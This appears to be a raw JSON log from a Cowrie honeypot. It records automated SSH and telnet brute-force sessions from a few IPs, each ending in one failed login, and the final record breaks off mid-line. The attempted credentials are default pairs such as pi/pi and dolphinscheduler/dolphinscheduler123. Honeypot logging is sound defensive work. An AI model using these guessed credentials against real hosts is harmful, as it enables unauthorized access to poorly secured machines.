{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:10:24.581043Z","src_ip":"212.227.235.229","session":"cead93129928"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:10:24.831343Z","src_ip":"212.227.235.229","session":"cead93129928"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:10:25.584075Z","src_ip":"212.227.235.229","session":"cead93129928"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:10:26.836623Z","src_ip":"212.227.235.229","session":"cead93129928"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46714,"dst_ip":"1.2.3.4","dst_port":22,"session":"be518be11b5a","protocol":"ssh","message":"New connection: 212.227.125.160:46714 (1.2.3.4:22) [session: be518be11b5a]","sensor":"my-vps","timestamp":"2025-08-28T07:10:34.203002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:10:34.207441Z","src_ip":"212.227.125.160","session":"be518be11b5a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:10:34.416856Z","src_ip":"212.227.125.160","session":"be518be11b5a"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:10:35.280887Z","src_ip":"212.227.125.160","session":"be518be11b5a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:10:36.497157Z","src_ip":"212.227.125.160","session":"be518be11b5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54240,"dst_ip":"1.2.3.4","dst_port":22,"session":"6eee514f132e","protocol":"ssh","message":"New connection: 212.227.235.229:54240 (1.2.3.4:22) [session: 6eee514f132e]","sensor":"my-vps","timestamp":"2025-08-28T07:10:40.554156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:10:40.554924Z","src_ip":"212.227.235.229","session":"6eee514f132e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:10:40.813672Z","src_ip":"212.227.235.229","session":"6eee514f132e"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:10:41.586308Z","src_ip":"212.227.235.229","session":"6eee514f132e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:10:42.845744Z","src_ip":"212.227.235.229","session":"6eee514f132e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41238,"dst_ip":"1.2.3.4","dst_port":22,"session":"c12fd27eb9e2","protocol":"ssh","message":"New connection: 212.227.125.160:41238 (1.2.3.4:22) [session: c12fd27eb9e2]","sensor":"my-vps","timestamp":"2025-08-28T07:10:50.117513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:10:50.118110Z","src_ip":"212.227.125.160","session":"c12fd27eb9e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:10:50.347474Z","src_ip":"212.227.125.160","session":"c12fd27eb9e2"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:10:50.996615Z","src_ip":"212.227.125.160","session":"c12fd27eb9e2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:10:52.214310Z","src_ip":"212.227.125.160","session":"c12fd27eb9e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41232,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a93a4b5edc1","protocol":"ssh","message":"New connection: 212.227.235.229:41232 (1.2.3.4:22) [session: 8a93a4b5edc1]","sensor":"my-vps","timestamp":"2025-08-28T07:10:56.476246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:10:56.477507Z","src_ip":"212.227.235.229","session":"8a93a4b5edc1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:10:56.727161Z","src_ip":"212.227.235.229","session":"8a93a4b5edc1"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:10:57.478188Z","src_ip":"212.227.235.229","session":"8a93a4b5edc1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:10:58.729947Z","src_ip":"212.227.235.229","session":"8a93a4b5edc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60584,"dst_ip":"1.2.3.4","dst_port":22,"session":"674c07eec06c","protocol":"ssh","message":"New connection: 212.227.125.160:60584 (1.2.3.4:22) [session: 674c07eec06c]","sensor":"my-vps","timestamp":"2025-08-28T07:11:05.798094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:11:05.799052Z","src_ip":"212.227.125.160","session":"674c07eec06c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:11:06.017941Z","src_ip":"212.227.125.160","session":"674c07eec06c"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:06.676813Z","src_ip":"212.227.125.160","session":"674c07eec06c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:07.899204Z","src_ip":"212.227.125.160","session":"674c07eec06c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56350,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb529ddc6365","protocol":"ssh","message":"New connection: 212.227.235.229:56350 (1.2.3.4:22) [session: bb529ddc6365]","sensor":"my-vps","timestamp":"2025-08-28T07:11:12.586585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:11:12.587509Z","src_ip":"212.227.235.229","session":"bb529ddc6365"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:11:12.839111Z","src_ip":"212.227.235.229","session":"bb529ddc6365"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:13.592191Z","src_ip":"212.227.235.229","session":"bb529ddc6365"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":39992,"dst_ip":"1.2.3.4","dst_port":23,"session":"600f27e375c0","protocol":"telnet","message":"New connection: 8.222.212.69:39992 (1.2.3.4:23) [session: 600f27e375c0]","sensor":"my-vps","timestamp":"2025-08-28T07:11:13.674903Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:14.845381Z","src_ip":"212.227.235.229","session":"bb529ddc6365"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40406,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9ea37ab8776","protocol":"ssh","message":"New connection: 212.227.125.160:40406 (1.2.3.4:22) [session: a9ea37ab8776]","sensor":"my-vps","timestamp":"2025-08-28T07:11:22.536231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:11:22.540780Z","src_ip":"212.227.125.160","session":"a9ea37ab8776"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:11:22.751596Z","src_ip":"212.227.125.160","session":"a9ea37ab8776"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:23.616155Z","src_ip":"212.227.125.160","session":"a9ea37ab8776"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":57924,"dst_ip":"1.2.3.4","dst_port":23,"session":"f9eb33ca9d91","protocol":"telnet","message":"New connection: 8.222.212.69:57924 (1.2.3.4:23) [session: f9eb33ca9d91]","sensor":"my-vps","timestamp":"2025-08-28T07:11:24.558304Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:24.833436Z","src_ip":"212.227.125.160","session":"a9ea37ab8776"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50042,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f1f66f49de2","protocol":"ssh","message":"New connection: 212.227.235.229:50042 (1.2.3.4:22) [session: 0f1f66f49de2]","sensor":"my-vps","timestamp":"2025-08-28T07:11:29.082482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:11:29.083394Z","src_ip":"212.227.235.229","session":"0f1f66f49de2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:11:29.328804Z","src_ip":"212.227.235.229","session":"0f1f66f49de2"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:30.067407Z","src_ip":"212.227.235.229","session":"0f1f66f49de2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:31.315159Z","src_ip":"212.227.235.229","session":"0f1f66f49de2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41390,"dst_ip":"1.2.3.4","dst_port":22,"session":"de4ed3c8f474","protocol":"ssh","message":"New connection: 212.227.125.160:41390 (1.2.3.4:22) [session: de4ed3c8f474]","sensor":"my-vps","timestamp":"2025-08-28T07:11:38.869810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:11:38.917532Z","src_ip":"212.227.125.160","session":"de4ed3c8f474"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 